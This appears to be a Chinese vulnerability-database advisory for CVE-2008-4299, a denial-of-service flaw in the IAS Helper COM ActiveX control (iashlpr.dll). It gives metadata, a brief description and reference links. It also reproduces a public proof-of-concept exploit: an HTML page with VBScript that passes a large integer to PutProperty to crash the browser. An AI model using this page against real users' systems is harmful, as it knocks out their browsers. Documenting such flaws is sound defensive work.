Microsoft Internet Authentication service(IAS) iashlpr.dll大整数拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1185114 漏洞类型 数字错误
发布时间 2008-09-29 更新时间 2008-09-29
CVE编号 CVE-2008-4299 CNNVD-ID CNNVD-200809-403
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84848
https://cxsecurity.com/issue/WLB-2008100091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-403
|漏洞详情
InternetAuthenticationService(IAS)是Windows上的远程身份认证服务。iashlpr.dll中的Service(IAS)HelperCOM组件的MicrosoftInternetAuthentication中的某个ActiveX控件。远程攻击者通过对PutProperty方法的第一自变量的一个大整数值来造成拒绝服务(浏览器崩溃)。
|漏洞EXP
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

"""  :::::: ::   ::       ::        ::  ::  ::::        """

"""  ::      :: ::        :: :::::: .. ::::   ::        """

"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """

"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """

"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """

"""                 ::                                  """

"""                                                     """

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

# Tilte: iashlpr.dll activex remote DOS

# Exp0iters member (order by alphabet) .........: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]

# Author........................................: [hamedata]

# E-mail........................................: [hamedata (at) gmail (dot) com [email concealed]]

# Location .....................................: [Iran]

# Software .....................................: [IAS Helper COM Component]

# Sp Tanx2 .....................................: [ALL HACKERS]

# Vulnerability: Remote DOS Exploit

# Part Expl0it & Bug Codes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-

<html>

<object classid='clsid:6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D' id='target' /></object>

<input language=VBScript onclick=try() type=button value='start'>

<script language='vbscript'>

Sub try

bad_data=-2147483647

secondarg="expl0iters"

target.PutProperty bad_data ,secondarg

End Sub

</script>

</html>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-

# Part Contact :

Contact me : hamedata (at) gmail (dot) com [email concealed]

Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM
|参考资料

来源:XF
名称:ias-helpercom-dos(45556)
链接:http://xforce.iss.net/xforce/xfdb/45556
来源:BUGTRAQ
名称:20080924IASHelperCOMComponent(iashlpr.dll)activexremoteDOS
链接:http://www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded
来源:SREASON
名称:4323
链接:http://securityreason.com/securityalert/4323